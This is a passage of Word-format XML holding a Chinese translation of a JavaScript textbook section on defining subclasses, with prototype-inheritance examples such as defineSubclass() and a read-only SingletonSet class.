      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>设置原型，以便</w:t>
      </w:r>
      <w:r>
        <w:t>SetFromArray</w:t>
      </w:r>
      <w:r>
        <w:t>能创建</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>的实例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>SetFromArray.prototype=Set.prototype;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s=new SetFromArray([1,2,3]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s instanceof Set//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="243" w:name="9_7_Zi_Lei_"/>
      <w:r>
        <w:t>9.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　子类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="243"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在面向对象编程中，类</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>可以继承自另外一个类</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>。我们将</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>称为父类（</w:t>
      </w:r>
      <w:r>
        <w:t>superclass</w:t>
      </w:r>
      <w:r>
        <w:t>），将</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>称为子类（</w:t>
      </w:r>
      <w:r>
        <w:t>subclass</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>的实例从</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>继承了所有的实例方法。类</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>可以定义自己的实例方法，有些方法可以重载类</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>中的同名方法，如果</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>的方法重载了</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>中的方法，</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>中的重载方法可能会调用</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>中的重载方法，这种做法称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>方法链</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>method chaining</w:t>
      </w:r>
      <w:r>
        <w:t>）。同样，子类的构造函数</w:t>
      </w:r>
      <w:r>
        <w:t>B()</w:t>
      </w:r>
      <w:r>
        <w:t>有时需要调用父类的构造函数</w:t>
      </w:r>
      <w:r>
        <w:t>A()</w:t>
      </w:r>
      <w:r>
        <w:t>，这种做法称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数链</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>constructor chaining</w:t>
      </w:r>
      <w:r>
        <w:t>）。子类还可以有子类，当涉及类的层次结</w:t>
      </w:r>
      <w:r>
        <w:t>构时，往往需要定义抽象类（</w:t>
      </w:r>
      <w:r>
        <w:t>abstract class</w:t>
      </w:r>
      <w:r>
        <w:t>）。抽象类中定义的方法没有实现。抽象类中的抽象方法是在抽象类的具体子类中实现的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中创建子类的关键之处在于，采用合适的方法对原型对象进行初始化。如果类</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>继承自类</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>B.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>必须是</w:t>
      </w:r>
      <w:r>
        <w:t>A.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>的后嗣。</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>的实例继承自</w:t>
      </w:r>
      <w:r>
        <w:t>B.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>，后者同样也继承自</w:t>
      </w:r>
      <w:r>
        <w:t>A.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>。本节将会对刚才提到的子类相关的术语做一一讲解，还会介绍类继承的替代方案：</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>组合</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>composition</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们从例</w:t>
      </w:r>
      <w:r>
        <w:t>9-6</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:t>开始讲解，本节将会讨论如何定义子类，如何实现构造函数链并重载方法，如何使用组合来代替继承，以及最后如何通过抽象类从实现中提炼出接口。本节以一个扩展的例子结束，这个例子定义了</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类的层次结构。注意，本节开始的几个</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>例子着重讲述了实现子类的基础技术。其中某些技术有着重要的缺陷，后续几节会讲到。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="244" w:name="9_7_1_Ding_Yi_Zi_Lei_"/>
      <w:r>
        <w:t>9.7.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　定义子类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="244"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的对象可以从类的原型对象中继承属性（通常继承的是方法）。如果</w:t>
      </w:r>
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t>是类</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>的实例，</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>的子类，那么</w:t>
      </w:r>
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t>也一定从</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>中继承了属性。为此，首先要确保</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>的原型对象继承自</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>的原型对象。通过</w:t>
      </w:r>
      <w:r>
        <w:t>inh</w:t>
      </w:r>
      <w:r>
        <w:t>erit()</w:t>
      </w:r>
      <w:r>
        <w:t>函数（例</w:t>
      </w:r>
      <w:r>
        <w:t>6-1</w:t>
      </w:r>
      <w:r>
        <w:t>），可以这样来实现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>B.prototype=inherit(A.prototype);//</w:t>
      </w:r>
      <w:r>
        <w:t>子类派生自父类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>B.prototype.constructor=B;//</w:t>
      </w:r>
      <w:r>
        <w:t>重载继承来的</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这两行代码是在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中创建子类的关键。如果不这样做，原型对象仅仅是一个普通对象，它只继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>，这意味着你的类和所有的类一样是</w:t>
      </w:r>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>的子类。如果将这两行代码添加至</w:t>
      </w:r>
      <w:r>
        <w:t>defineClass()</w:t>
      </w:r>
      <w:r>
        <w:t>函数中（参照</w:t>
      </w:r>
      <w:r>
        <w:t>9.3</w:t>
      </w:r>
      <w:r>
        <w:t>节），可以将它变成例</w:t>
      </w:r>
      <w:r>
        <w:t>9-</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>defineSubclass()</w:t>
      </w:r>
      <w:r>
        <w:t>函数和</w:t>
      </w:r>
      <w:r>
        <w:t>Function.prototype.extend()</w:t>
      </w:r>
      <w:r>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-11</w:t>
      </w:r>
      <w:r>
        <w:t>：定义子类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>用一个简单的函数创建简单的子类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function defineSubclass(superclass,//</w:t>
      </w:r>
      <w:r>
        <w:t>父类的构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>constructor,//</w:t>
      </w:r>
      <w:r>
        <w:t>新的子类的构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>methods,//</w:t>
      </w:r>
      <w:r>
        <w:t>实例方法</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>复制至原型中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>statics)//</w:t>
      </w:r>
      <w:r>
        <w:t>类属性</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>复制至构造函数中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>建立子类的原型对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>constructor.prototype=inherit(superclass.pro</w:t>
      </w:r>
      <w:r>
        <w:t>totype);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>constructor.prototype.constructor=constructor;//</w:t>
      </w:r>
      <w:r>
        <w:t>像对常规类一样复制方法和类属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(methods)extend(constructor.prototype,methods);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(statics)extend(constructor,statics);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回这个类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return constructor;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>也可以通过父类构造函数的方法来做到这一点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Function.prototype.extend=function(constructor,methods,statics){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return defineSubclass(this,constructor,methods,statics);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9-12</w:t>
      </w:r>
      <w:r>
        <w:t>展示了不使用</w:t>
      </w:r>
      <w:r>
        <w:t>defineSubclass()</w:t>
      </w:r>
      <w:r>
        <w:t>函数如何</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>手动</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>实现子类。这里定义了</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>的子类</w:t>
      </w:r>
      <w:r>
        <w:t>SingletonSet</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>SingletonSet</w:t>
      </w:r>
      <w:r>
        <w:t>是一个特殊的集合，它是只读的，而且含有单独的常量成员。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-12</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>SingletonSet:</w:t>
      </w:r>
      <w:r>
        <w:t>一个简单的子类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function SingletonSet(member){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.member=member;//</w:t>
      </w:r>
      <w:r>
        <w:t>记住集合中这个唯一的成员</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个原型对象，这个原型对象继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>的原型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>SingletonSet.prototype=inherit(Set.prototype);//</w:t>
      </w:r>
      <w:r>
        <w:t>给原型添加属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果有同名的属性就覆盖</w:t>
      </w:r>
      <w:r>
        <w:t>Set.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>中的同名属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>extend(SingletonSet.prototype,{//</w:t>
      </w:r>
      <w:r>
        <w:t>设置合适的</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>constructor:</w:t>
      </w:r>
      <w:r>
        <w:t>SingletonSet,//</w:t>
      </w:r>
      <w:r>
        <w:t>这个集合是只读的：调用</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>remove()</w:t>
      </w:r>
      <w:r>
        <w:t>都会报错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>add:function(){throw"read-only set";},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>remove:function(){throw"read-only set";},//SingletonSet</w:t>
      </w:r>
      <w:r>
        <w:t>的实例中永远只有一个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>size:function(){return 1;},//</w:t>
      </w:r>
      <w:r>
        <w:t>这个方法只调用一次，传入这个集合的唯一成员</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>foreach:function(f,context){f.call(context,this.membe</w:t>
      </w:r>
      <w:r>
        <w:t>r);},//contains()</w:t>
      </w:r>
      <w:r>
        <w:t>方法非常简单：只须检查传入的值是否匹配这个集合唯一的成员即可</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>contains:function(x){return x===this.member;}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这里的</w:t>
      </w:r>
      <w:r>
        <w:t>SingletonSet</w:t>
      </w:r>
      <w:r>
        <w:t>类是一个比较简单的实现，它包含</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个简单的方法定义。它实现了</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个核心的</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>方法，但从它的父类中继承了</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>toArray()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。定义子类就是为了继承这些方法。比如，</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类的</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（在</w:t>
      </w:r>
      <w:r>
        <w:t>9.4</w:t>
      </w:r>
      <w:r>
        <w:t>节中定义）用来对</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>实例进行比较，只要</w:t>
      </w:r>
      <w:r>
        <w:t>Se</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>的实例包含</w:t>
      </w:r>
      <w:r>
        <w:t>size()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>foreach()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，就可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>比较。因为</w:t>
      </w:r>
      <w:r>
        <w:t>SingletonSet</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>的子类，所以它自动继承了</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>的实现，不用再实现一次。当然，如果想要最简单的实现方式，那么给</w:t>
      </w:r>
      <w:r>
        <w:t>SingletonSet</w:t>
      </w:r>
      <w:r>
        <w:t>类定义它自己的</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>版本会更高效一些：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>SingletonSet.prototype.equals=function(that){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return that instanceof </w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>that.size()==1</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>that.contains(this.member);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需要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>SingletonSet</w:t>
      </w:r>
      <w:r>
        <w:t>不是将</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>中的方法列表静态地借用过来，而是动态地从</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类继承方法。如果给</w:t>
      </w:r>
      <w:r>
        <w:t>Set.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>添</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>加新的方法，</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>SingletonSet</w:t>
      </w:r>
      <w:r>
        <w:t>的所有实例就会立即拥有这个方法（假定</w:t>
      </w:r>
      <w:r>
        <w:t>SingletonSet</w:t>
      </w:r>
      <w:r>
        <w:t>没有定义与之同名的方法）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="245" w:name="9_7_2_Gou_Zao_Han_Shu_He_Fang_Fa_Lian_"/>
      <w:r>
        <w:t>9.7.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　构造函数和方法链</w:t>
      </w:r>
      <w:bookmarkEnd w:id="245"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后一节的</w:t>
      </w:r>
      <w:r>
        <w:t>SingletonSet</w:t>
      </w:r>
      <w:r>
        <w:t>类定义了全新的集合实现，而且将它继承自其父类的核心方法全部替换。然而定义子类时，我们往往希望对父类的行为进行修改或扩充，而不是完全替换掉它们。为了做到这一点，构造函数和子类的方法需要调用或链接到父类构造函数和父类方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
